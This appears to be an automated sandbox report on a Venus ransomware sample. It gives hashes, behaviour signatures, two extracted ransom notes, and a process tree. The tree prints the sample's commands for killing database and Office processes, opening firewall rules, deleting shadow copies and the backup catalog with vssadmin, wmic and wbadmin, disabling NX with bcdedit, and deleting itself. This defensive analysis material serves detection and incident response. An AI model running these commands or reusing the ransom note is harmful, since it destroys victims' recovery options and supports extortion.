Overview

overview

10

Static

static

10

fa57cf745e...b3.exe

windows7-x64

10

fa57cf745e...b3.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    101s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2022 04:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe

  • Size

    225KB

  • MD5

    f62590e838b1d13960abb6b363e03ed9

  • SHA1

    66f706a7d39038964471e0a009a76e0f978fb075

  • SHA256

    fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3

  • SHA512

    7d372043b31cca8d6d73ecd386e08d720ec29fa02e6c01b099c70977e7bdbd06f2a2a8c44f1b813c1a4b67b12a37a51efcfc3776e8667ed216b25d2bf1d56556

  • SSDEEP

    6144:IuC7JmXiQwAh6jkJwkNV50DEr9MxgTw7ozFD254W:IuCteiQwAjw1DDGcopfW

Score
10/10
venusevasionpersistenceransomwarespywarestealer

Malware Config

Extracted

Path

C:\README.html

Ransom Note
<html><head><title>Venus</title><style type = "text/css">*{padding:0;margin:0}p{color:white}.f{background-color:#ff7c00;width:100%;margin-left:auto;margin-right:auto;height:100%}.c h1{color:white;line-height:80px}.r{word-break:break-all;float:left;width:100%;text-align:center}</style></head><body><div class="f"><div class="c"><h1 align="center">&lt;&lt;&lt;Venus&gt;&gt;&gt;</h1></div><div class="r"><p></br></br></br></br><strong>We downloaded and encrypted your data.</strong></br>Only we can decrypt your data.<br><strong>IMPORTANT!</strong><br> If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay.<br> In this case we will not be able to help you.<br>Do not play with files.</p><p>Do not rename encrypted files.<br>Do not try to decrypt your data using third party software, it may cause permanent data loss.<br>Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.</br>-----------------------------------------------------</br>Contact and send this file to us:<br><strong><br>email:[email protected]<br>email:[email protected]<br></strong><br><br>7tHcfikjaWfTUUQi1kF4/IpRAHcm3O9U8KwEbX+hYTWWtdPCTp1j+amG/hwc/ff7 W5hdcXuUUdNz5ctjkpvYvJTI0hvnIVuT/qua5Ia8HTV5jdjtBhO5CwxiCoyV29k5 I+OOoxMV/qujZrYStLFjBbPKeaCIg+zKRBpF4ylSY8Gv6i+zHIgNUPaSKrNKJ7G9 iqimwPqmZBPZLUHA228iP144WebJTgBBrx97xxOAtlY8Yw4SH5O1EMA/VFr8ZxHE e7vBYUSVWKEPd8deN817uBxttArs0CZiHFMq72Re9ImTJHGkjpSAlg0cR+sx3oS/ iIoXY8VYnQyHhc1nzszlTdUAT3AsPuq/g1omgDXZ6uLpOFVdvLc10yph3mnH8wu/ e88ezM3wGRv0/LJY9ZDXEJGKaOOdTasAsXDXVcjgJErV4f5JE7fKNtvhT+GUgCPI thtzOfTYNjRL5TbB7xPlTIEKrVGQEK6qQ9B+wC5TEKya0cZUB3aH72YhSXHu9ju2 r15OjoKjlDgs4OulkN3qyfQo15KULC1HPcDx2W//pga/usSrDxafOx7wzIlzEZwf I2zlmYvJKsInCZ/Y+MagidXlqByaKMTuJHLGLFi3kDCLPlR8WCdj46MueejWjTFu LuO66VrSeuV80fg= </p></div></body></html></html></body></html>
Emails

us:<br><strong><br>email:[email protected]<br>email:[email protected]<br></strong><br><br>7tHcfikjaWfTUUQi1kF4/IpRAHcm3O9U8KwEbX+hYTWWtdPCTp1j+amG/hwc/ff7

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\180596361972527219.hta

Ransom Note
<<<Venus>>> We downloaded and encrypted your data.Only we can decrypt your data.IMPORTANT! If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay. In this case we will not be able to help you. Do not play with files. Do not rename encrypted files. Do not try to decrypt your data using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.-----------------------------------------------------Contact and send this file to us: email:[email protected] email:[email protected]
Emails

email:[email protected]

email:[email protected]

Signatures

  • Venus

    Venus is a ransomware first seen in 2022.

    ransomwarevenus
  • Venus Ransomware 5 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
    ransomwareevasion
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops desktop.ini file(s) 34 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe
    "C:\Users\Admin\AppData\Local\Temp\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4300
    • C:\Windows\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe
      "C:\Windows\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe" g g g o n e123
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Checks computer location settings
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4912
      • C:\Windows\System32\cmd.exe
        /C taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3376
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM msftesql.exe /IM sqlagent.exe /IM sqlbrowser.exe /IM sqlservr.exe /IM sqlwriter.exe /IM oracle.exe /IM ocssd.exe /IM dbsnmp.exe /IM synctime.exe /IM mydesktopqos.exe /IM agntsvc.exe /IM isqlplussvc.exe /IM xfssvccon.exe /IM mydesktopservice.exe /IM ocautoupds.exe /IM agntsvc.exe /IM agntsvc.exe /IM agntsvc.exe /IM encsvc.exe /IM firefoxconfig.exe /IM tbirdconfig.exe /IM ocomm.exe /IM mysqld.exe /IM mysqld-nt.exe /IM mysqld-opt.exe /IM dbeng50.exe /IM sqbcoreservice.exe /IM excel.exe /IM infopath.exe /IM msaccess.exe /IM mspub.exe /IM onenote.exe /IM outlook.exe /IM powerpnt.exe /IM sqlservr.exe /IM thebat64.exe /IM thunderbird.exe /IM winword.exe /IM wordpad.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4748
      • C:\Windows\System32\cmd.exe
        /C netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2936
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
          4⤵
          • Modifies Windows Firewall
          PID:1372
      • C:\Windows\System32\cmd.exe
        /C wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5972
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:6024
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:5936
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {current} nx AlwaysOff
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3512
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic SHADOWCOPY DELETE
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5980
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\180596361972527219.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
          PID:3480
      • C:\Windows\System32\cmd.exe
        /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4932
        • C:\Windows\system32\PING.EXE
          ping localhost -n 3
          3⤵
          • Runs ping.exe
          PID:4576
    • C:\Windows\system32\wbengine.exe
      "C:\Windows\system32\wbengine.exe"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:6060
    • C:\Windows\System32\vdsldr.exe
      C:\Windows\System32\vdsldr.exe -Embedding
      1⤵
        PID:6112
      • C:\Windows\System32\vds.exe
        C:\Windows\System32\vds.exe
        1⤵
        • Checks SCSI registry key(s)
        PID:2644
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2848

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\180596361972527219.hta
        Filesize

        1KB

        MD5

        7bf5504493e7f57fc33f3a57a63661b0

        SHA1

        624830040ff9c8856c9eefc6c34ecab242272d92

        SHA256

        4af73b1d4a6eb3d84ad3119692b156763c8616c19d671632b8afeb90878f3285

        SHA512

        abd07cd6eb2f4e7d93f7987eba0f9b18712db78a1e29c50456b871d9d91491328cd88846feaa712763ac558bc35081aa2535a046f99c61fad50462fbeb17cc0e

        Download Submit

      • C:\Windows\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe
        Filesize

        225KB

        MD5

        f62590e838b1d13960abb6b363e03ed9

        SHA1

        66f706a7d39038964471e0a009a76e0f978fb075

        SHA256

        fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3

        SHA512

        7d372043b31cca8d6d73ecd386e08d720ec29fa02e6c01b099c70977e7bdbd06f2a2a8c44f1b813c1a4b67b12a37a51efcfc3776e8667ed216b25d2bf1d56556

        Download Submit

      • C:\Windows\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe
        Filesize

        225KB

        MD5

        f62590e838b1d13960abb6b363e03ed9

        SHA1

        66f706a7d39038964471e0a009a76e0f978fb075

        SHA256

        fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3

        SHA512

        7d372043b31cca8d6d73ecd386e08d720ec29fa02e6c01b099c70977e7bdbd06f2a2a8c44f1b813c1a4b67b12a37a51efcfc3776e8667ed216b25d2bf1d56556

        Download Submit

      • memory/1372-140-0x0000000000000000-mapping.dmp

        Download

      • memory/2936-138-0x0000000000000000-mapping.dmp

        Download

      • memory/3376-139-0x0000000000000000-mapping.dmp

        Download

      • memory/3480-146-0x0000000000000000-mapping.dmp

        Download

      • memory/3512-148-0x0000000000000000-mapping.dmp

        Download

      • memory/4300-132-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

        Download

      • memory/4576-141-0x0000000000000000-mapping.dmp

        Download

      • memory/4748-142-0x0000000000000000-mapping.dmp

        Download

      • memory/4912-143-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

        Download

      • memory/4912-135-0x0000000000400000-0x000000000043E000-memory.dmp

        Filesize

        248KB

        Download

      • memory/4912-133-0x0000000000000000-mapping.dmp

        Download

      • memory/4932-136-0x0000000000000000-mapping.dmp

        Download

      • memory/5936-147-0x0000000000000000-mapping.dmp

        Download

      • memory/5972-144-0x0000000000000000-mapping.dmp

        Download

      • memory/5980-149-0x0000000000000000-mapping.dmp

        Download

      • memory/6024-145-0x0000000000000000-mapping.dmp

        Download